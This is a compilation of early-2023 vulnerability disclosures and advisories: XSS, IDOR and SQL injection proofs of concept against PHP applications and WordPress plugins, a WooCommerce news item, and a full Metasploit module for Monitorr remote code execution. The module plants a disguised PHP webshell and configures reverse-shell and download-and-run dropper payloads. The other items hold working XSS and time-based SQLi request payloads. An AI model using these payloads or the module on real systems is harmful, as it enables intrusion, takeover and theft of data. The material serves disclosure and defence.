Sales Tracker Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Sales Tracker Management System - Cross Site Scripting Vulnerability (Authenticated)# Date: 23/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-sts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Sales Tracker Management System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-sts/admin/?page=clients'%3balert(document.cookie)%2f%2f HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/php-sts/admin/Cookie: PHPSESSID=n0brm8te79kaf0nvf7d1hvs6rm```

Sales Tracker Management System 1.0 Cross Site Scripting

Faveo 5.0.1 allows remote attackers to obtain sensitive information via a modified user ID in an Insecure Direct Object Reference (IDOR) attack.

Whats is Faveo?

**Faveo** is an ticket based support system built on the PHP based Laravel framework. The word Faveo comes from Latin, and means “to be favourable”. It provides businesses with an automated helpdesk system to manage customer support. It has an inbuilt knowledge base for self-service by the customer.

This vulnerability on version **Stable ServiceDesk Enterprise(v5.0.1)  
**The vulnerability has been fixed in v6.0.3

Let’s demonstrate the first vulnerability that was found:

**IDOR - Insecure direct object references**

This test uses the test user provided by the **demo\_client** platform itself:

After authenticating on the application by going to my profile and then profile we can see the requests via Burp Suite.

Intercepting the requests we can see the first thing that caught my attention, we can see that our user Demo is referenced by the number 21 as per the printout below, the other parameters will also be of help for the next vulnerability.

My user Demo:

By interchanging the request again and changing the ID to another number we are able to get the personal data of other users registered in the system.

Result of the request manipulating the user ID:

**Broken Access Control**

To contextualize this failure, first we need to understand that within the platform each user or agent is registered within groups where each one can only view the tickets relevant to their access

According to the print below, we can see that going to my tickets, our customer user has 4 open tickets and two closed tickets.

Going back to my profile and intercepting the burp request I managed to gain unauthorized access as shown below:

In the request to access our profile, if we removed the **client** from the panel, we were able to obtain access that only the system administrator could have and we were able to include ourselves in other **organizations** and read all the tickets in the system, even though we were an ordinary user.

By removing the **client**, we can view our user’s **work phone**, **email** and **mobile phone**, and if we change the **userid** of the request, we can also obtain this data from any user on the platform.

Result by changing the **user id** and removing the **client** from the request:

We were able to view the personal data of the **Aston** user and the **organization** he is part of within the system.

Returning to our demo user, we were able to include ourselves in all the organizations available in the system:

After selecting the organizations just click on submit:

Changes made successfully

Returning to my tickets now, we can see 25 open and 6 closed tickets where we can read all tickets from other organizations proving the failure.

CVE-2023-24625: CVE-2023–24625 / IDOR in Faveo Service Desk - cupc4k3 - Medium

SourceCodester Loan Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Type parameter under the Edit Loan Types module.

**Loan-Management-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

Vul\_Author: Kai Wang

Login Account:admin Password:admin123

vendors: https://itsourcecode.com/free-projects/php-project/loan-management-system-project-in-php-with-source-code/

Vulnerability File: /Loan/ajax.php

Vulnerability location: /Loan/ajax.php?action=save\_loan\_type HTTP/1.1

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

    POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
    Host: 10.12.180.79
    Content-Length: 362
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Origin: http://10.12.180.79
    Referer: http://10.12.180.79/Loan/index.php?page=loan_type
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
    Connection: close
    
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="type_name"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="description"
    
    test loans
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--
    

Get into the Loan Types page,click the edit button as shown in the image

input a XSS script in the 'Type' input box

click save and you will see an alert

CVE-2023-27242: Loan-Management-System/README.md at main · kaikai-11/Loan-Management-System

Patches have been released for a critical security flaw impacting the WooCommerce Payments plugin for WordPress, which is installed on over 500,000 websites.
The flaw, if left unresolved, could enable a bad actor to gain unauthorized admin access to impacted stores, the company said in an advisory on March 23, 2023. It impacts versions 4.8.0 through 5.6.1.
Put differently, the issue could permit

Patches have been released for a critical security flaw impacting the WooCommerce Payments plugin for WordPress, which is installed on over 500,000 websites.

The flaw, if left unresolved, could enable a bad actor to gain unauthorized admin access to impacted stores, the company said in an advisory on March 23, 2023. It impacts versions 4.8.0 through 5.6.1.

Put differently, the issue could permit an "unauthenticated attacker to impersonate an administrator and completely take over a website without any user interaction or social engineering required," WordPress security company Wordfence said.

The vulnerability appears to reside in a PHP file called "class-platform-checkout-session.php," Sucuri researcher Ben Martin noted.

Credited with discovering and reporting the vulnerability is Michael Mazzolini of Swiss penetration testing company GoldNetwork.

WooCommerce also said it worked with WordPress to auto-update sites using affected versions of the software. Patched versions include 4.8.2, 4.9.1, 5.0.4, 5.1.3, 5.2.2, 5.3.1, 5.4.1, 5.5.2, and 5.6.2.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Furthermore, the maintainers of the e-commerce plugin noted that it's disabling the WooPay beta program owing to concerns that the security defect has the potential to impact the payment checkout service.

There is no evidence that the vulnerability has been actively exploited to date, but it's expected to be weaponized on a large scale once a proof-of-concept becomes available, Wordfence researcher Ram Gall cautioned.

Besides updating to the latest version, users are recommended to check for newly added admin users, and if so, change all administrator passwords and rotate payment gateway and WooCommerce API keys.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical WooCommerce Payments Plugin Flaw Patched for 500,000+ WordPress Sites

PrestaShop jmsblog 2.5.5 was discovered to contain a SQL injection vulnerability.

The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joo masters PrestaShop themes

**Summary**

*   **CVE ID**: CVE-2023-27034
*   **Published at**: 2023-03-13
*   **Advisory source**: none
*   **Vendor**: PrestaShop
*   **Product**: jmsblog
*   **Impacted release**: at least 2.5.5 and 2.5.6
*   **Product author**: Joommasters
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Several front controller in /controllers/front/ hold sensitives SQL calls that can be executed with a trivial http call and exploited to forge a blind SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Patch**

    --- a/controllers/front/archive.php
    +++ b/controllers/front/archive.php
    @@ -55,1 +55,1 @@ function getPosts
    -            ' AND DATE_FORMAT(hss.created,"%Y-%m") LIKE "%'.$_month.'%"
    +            ' AND DATE_FORMAT(hss.created,"%Y-%m") LIKE "%'.pSQL($_month).'%"
    

    --- a/controllers/front/post.php
    +++ b/controllers/front/post.php
    @@ -85,1 +85,1 @@ function getPosts
    -                WHERE pc.`email` = \''.$email.'\'
    +                WHERE pc.`email` = \''.pSQL($email).'\'
    

    --- a/controllers/front/tag.php
    +++ b/controllers/front/tag.php
    @@ -53,1 +53,1 @@ function getPosts
    -            ' AND hssl.`tags` LIKE "%'.$tag.'%"
    +            ' AND hssl.`tags` LIKE "%'.pSQL($tag).'%"
    

**Timeline**

Date

Action

2022-09-01

Issue discovered during a pentest

2023-02-17

Contact the author

2023-03-13

Publish this security advisory

2023-03-16

CVE ID affected

**Other recommandations**

*   Upgrade PrestaShop beyond 1.7.8.8 (and 8.0.1) to disable multiquery executions (separated by “;”).
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Links**

*   Joom masters web site
*   National Vulnerability Database

CVE-2023-27034: Blind SQL injection vulnerability in Jms Blog (jmsblog) PrestaShop module

NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at `/NotrinosERP/sales/customer_delivery.php`.

**NotrinosERP vulnerable to SQL Injection**

High severity GitHub Reviewed Published Mar 23, 2023 to the GitHub Advisory Database • Updated Mar 23, 2023

GHSA-4pqp-69m3-f8pp: NotrinosERP vulnerable to SQL Injection

RESERVED NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customer_delivery.php.

**Description**

The endpoint **/sales/customer\_delivery.php** is vulnerable to Blind SQL Injection (Time-based) via the GET parameter **OrderNumber**. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order. From the source code perspective, the endpoint will execute the **adjust\_shipping\_charge** function in the **\\sales\\customer\_delivery.php** file line number 107. As shown in the code snippet below, the OrderNumber parameter is taken directly from the query string and passed into the function without any sanitization or escaping.

    adjust_shipping_charge($ord, $_GET['OrderNumber']);
    

The adjust\_shipping\_charge function itself can be found in the **\\sales\\includes\\db\\sales\_delivery\_db.inc** file line number 203. In that function the OrderNumber parameter or $trans\_no is concatenated directly into the SQL query.

    function adjust_shipping_charge(&$delivery, $trans_no) {
    	$sql = "SELECT sum(ov_freight) as freight FROM ".TB_PREF."debtor_trans WHERE order_ = $trans_no AND type = " . ST_CUSTDELIVERY . " AND debtor_no = " . $delivery->customer_id;
    	$result = db_query($sql, 'Can not find delivery notes');
    

This allows the attacker to inject malicious OrderNumber payloads to execute the malicious SQL query.

**Proof of Concept**

Triggering time delays with MySQL sleep function.

Normal request will take around 200 milis (0.2 seconds) response time

    GET /NotrinosERP/sales/customer_delivery.php?OrderNumber=10 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/NotrinosERP/sales/sales_order_entry.php?AddedID=12
    Cookie: Notrinos2938c152fda6be29ce4d5ac3a638a781=8s9gl1g6fphudemau5ul3polro; FAinstall=n916ogdqa12ni92dlhmgqiv7gt
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    

The following malicious request with OrderNumber parameter set to 10+UNION+SELECT+SLEEP(2)%23--+- will take around 2000 milis (2 seconds) response time.

    GET /NotrinosERP/sales/customer_delivery.php?OrderNumber=10+UNION+SELECT+SLEEP(2)%23--+- HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/NotrinosERP/sales/sales_order_entry.php?AddedID=12
    Cookie: Notrinos2938c152fda6be29ce4d5ac3a638a781=8s9gl1g6fphudemau5ul3polro; FAinstall=n916ogdqa12ni92dlhmgqiv7gt
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    

Note: The orderNumber (e.g., 10) need to be valid/existing order number.

**Root Cause**

User input on the WorkOrder parameter ($trans\_no) is not sanitized and used directly in the query through string concatenation. https://github.com/notrinos/NotrinosERP/blob/master/sales/includes/db/sales\_delivery\_db.inc#L204

**Recommendation**

Avoid direct string concatenation into the sql query. It's recommended to use input sanitization as well as implementing parameterized query.

CVE-2023-24788: CVE/CVE-2023-24788.md at main · arvandy/CVE

File upload vulnerability in CSKaza CSZ CMS v.1.2.2 fixed in v1.2.4 allows attacker to execute aritrary commands and code via crafted PHP file.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Bla1n opened this issue

Jul 14, 2019

· 2 comments

Closed

**There is an arbitrary file upload vulnerability #20**

Bla1n opened this issue

Jul 14, 2019

· 2 comments

**Comments**

There are any files uploaded in the background of your website, you can upload PHP files, so that if the administrator password is leaked, the file uploaded through here can be directly getshell, take over the web  
example:  
  
  
I think you should limit the type of file you upload

administrator password is leaked. It's user error.

And on this section. I want to use like a file manager.  
I can edit/ upload with replace the php file without FTP.

If you have other idea to do like this. Please tell me know.

Fixed already on 1.2.4  
Thanks.

2 participants

CVE-2020-19786: There is an arbitrary file upload vulnerability · Issue #20 · cskaza/cszcms

This Metasploit module exploits an arbitrary file upload vulnerability and achieves remote code execution in the Monitorr application. Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation. Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data). Monitorr versions 1.7.6m, 1.7.7d, and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Monitorr unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits an arbitrary file upload vulnerability and achieving an RCE in the Monitorr application.          Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation.          Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges          under which the web services run (typically user www-data).          Monitorr 1.7.6m, 1.7.7d and below are affected.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Lyhins Lab' # discovery        ],        'References' => [          [ 'CVE', '2020-28871' ],          [ 'URL', 'https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/' ],          [ 'URL', 'https://attackerkb.com/topics/UNlzoDVL3o/cve-2020-28871' ],          [ 'EDB', '48980' ],          [ 'PACKETSTORM', '163263' ],          [ 'PACKETSTORM', '170974' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'win', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_command,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'              }            }          ],          [            'Windows EXE Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :windows_dropper,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2020-11-16',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The Monitorr endpoint URL', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def upload_php_code(payload)    # Upload webshell hidden in a GIF with Metasploit payload code    # randomize file name if option WEBSHELL is not set. Use lowercase characters because upload stores file name in lowercase    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha_lower(8..16)}.php"    else      @webshell_name = datastore['WEBSHELL'].to_s.downcase    end    # construct multipart form data    form_data = Rex::MIME::Message.new    form_data.add_part(payload.prepend("GIF89a#{rand_text_numeric(6..8)}"), 'image/gif', 'binary', "form-data; name=\"fileToUpload\"; filename=\"#{@webshell_name}\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'assets', 'php', 'upload.php'),      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    return false unless res && res.code == 200 && !res.body.blank?    # parse HTML response to find the id with value 'uploadok' that indicates a successful upload    html = res.get_html_document    !!html.at('div[@id="uploadok"]')  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = Base64.strict_encode64(datastore['COMMAND'])    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'assets', 'data', 'usrimg', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'assets', 'data', 'usrimg', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'assets', 'js', 'version', 'version.txt'),      'ctype' => 'application/x-www-form-urlencoded'    })    if res && res.code == 200 && !res.body.blank?      # version 0.8.6d is the first release where versioning using version.txt is introduced according the release notes.      version = Rex::Version.new(res.body)      return CheckCode::Vulnerable("Monitorr version: #{version}") if version.between?(Rex::Version.new('0.8.6'), Rex::Version.new('1.7.7'))    end    CheckCode::Unknown  end  def exploit    # select webshell depending on the target setting (PHP or others).    # randomize and encode all parameters to obfuscate the payload and execution    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      @webshell = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    else      @webshell = "<?=base64_decode($_GET[\'#{@get_param}\'])(base64_decode($_POST[\'#{@post_param}\']));?>"    end    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed, the system is likely patched.") unless upload_php_code(@webshell)    register_file_for_cleanup(@webshell_name.to_s)    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    when :windows_command      execute_command(payload.encoded)    when :windows_dropper      execute_cmdstager(flavor: :psh_invokewebrequest, linemax: 65536)    end  endend

Monitorr 1.7.6m / 1.7.7d Remote Code Execution

WordPress plugins Watu Quiz versions 3.3.9 and below, GN Publisher versions 1.5.5 and below, and Japanized For WooCommerce versions 2.5.4 and below suffer from cross site scripting vulnerabilities.

Description: Reflected Cross-Site Scripting 

Affected Plugin: Watu Quiz

Plugin Slug: watu

Affected Versions: <= 3.3.9

CVE ID: CVE-2023-0968

CVSS Score: 6.1 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Researcher/s: Marco Wotschka 

Fully Patched Version: 3.3.9.1

Description: Reflected Cross-Site Scripting 

Affected Plugin: GN Publisher: Google News Compatible RSS Feeds

Plugin Slug: gn-publisher

Affected Versions: <= 1.5.5

CVE ID: CVE-2023-1080

CVSS Score: 6.1 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Researcher/s: Marco Wotschka 

Fully Patched Version: 1.5.6

Description: Reflected Cross-Site Scripting 

Affected Plugin: Japanized For WooCommerce

Plugin Slug: woocommerce-for-japan

Affected Versions: <= 2.5.4

CVE ID: CVE-2023-0942

CVSS Score: 6.1 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Researcher/s: Marco Wotschka 

Fully Patched Version: 2.5.5

Vulnerability Details

Watu Quiz is a plugin that offers site owners the ability to create exams, quizzes and surveys. It allows administrators to review quiz submissions and filter search results by username, email, date taken and quiz score. Unfortunately, the search terms – provided as URL parameters – were not properly sanitized before being echoed on the search form.

Visiting a URL containing a malicious payload sufficed to trigger the execution of malicious JavaScript code in the context of the visiting user’s session. Since the exploitable page was an administrative page, this code could be used to create new administrator users or to perform other similarly severe actions potentially resulting in site takeover.

A vulnerable line of code in the plugin used the user-provided parameter and output it directly:

<input name="dn" type="text" value="<?php echo @$_GET['dn']?>" />

The dn parameter can be used to close out the value attribute, add an onmouseover event (or an onfocus event combined with the autofocus attribute) and execute JavaScript in the context of the victim’s browser.

/wp-admin/admin.php?page=watu_takings&exam_id=1&dn="%2Fonmouseover%3Dalert(123)%2F%2F

Versions up to 3.3.9 of this plugin are vulnerable. The issue is fixed in version 3.3.9.1 as of March 3, 2023.

GN Publisher is a plugin that makes RSS feeds which comply with Google News RSS feed technical requirements – necessary for inclusion in the Google News Publisher Center. The plugin addresses some common RSS compatibility issues publishers typically experience.

On its main configuration page It offers a tabbed form where administrators can change plugin-specific settings. However, the plugin does not properly escape the tab name before outputting it.

The software features a button in the top right corner that offers an upgrade to the PRO version. The code for the button in the vulnerable version is shown below (slightly reformatted for legibility):

As can be seen, the button element contains a php echo statement that outputs the tab parameter as a button class attribute. An unauthenticated attacker can take advantage of this and inject attribute-based JavaScript that executes on an event of the attacker’s choosing such as onmouseover, or onfocus in combination with autofocus, assuming they can also successfully trick a site administrator into performing an action.

/wp-admin/options-general.php?page=gn-publisher-settings&tab=hans%22%2F+onmouseover%3Dalert%281%29%3B%2F%2F

Versions up to, and including, 1.5.5 are vulnerable. Version 1.5.6 addressed this issue and was released on February 24, 2023.

The plugin Japanized for WooCommerce adds additional features to WooCommerce that make it more user-friendly for a Japanese audience, such as honorific titles and custom payment options geared towards the Japanese market. Similarly to the other two plugins discussed above, Japanized for WooCommerce outputs unsanitized user input provided via URL parameter.

As long as a tab parameter is provided, it will be output as part of the provided JavaScript that follows. A malicious piece of code can be used to close the script tag, open a new one, and include code to be executed on behalf of the visiting user.

/wp-admin/admin.php?page=wc4jp-options&tab=hans%27%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Just like the other two vulnerabilities discussed above, this vulnerability can be exploited by unauthenticated attackers as long as an administrator of a vulnerable site can be tricked into performing an action such as clicking on a link leading them to the vulnerable form.

This issue is patched as of version 2.5.6, which was released on February 28, 2023.

As a final reminder, as is typical for Reflected Cross-Site Scripting vulnerabilities, these attacks can be carried out by unauthenticated users. However, the interaction of a site user is a requirement. Furthermore, the malicious injection does not persist as it is not stored in the database.

Conclusion

In today’s post, we detailed flaws in three plugins that made it possible for attackers to inject malicious JavaScript into a vulnerable site. While the exploitation of these vulnerabilities requires some degree of social engineering, they all could be used for site takeover.

All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.

If you believe your site has been compromised as a result of these vulnerabilities or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

If you have any friends or colleagues who are using one of these plugins, please share this announcement with them and encourage them to update to the latest version as soon as possible.

If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard.

Tag

#php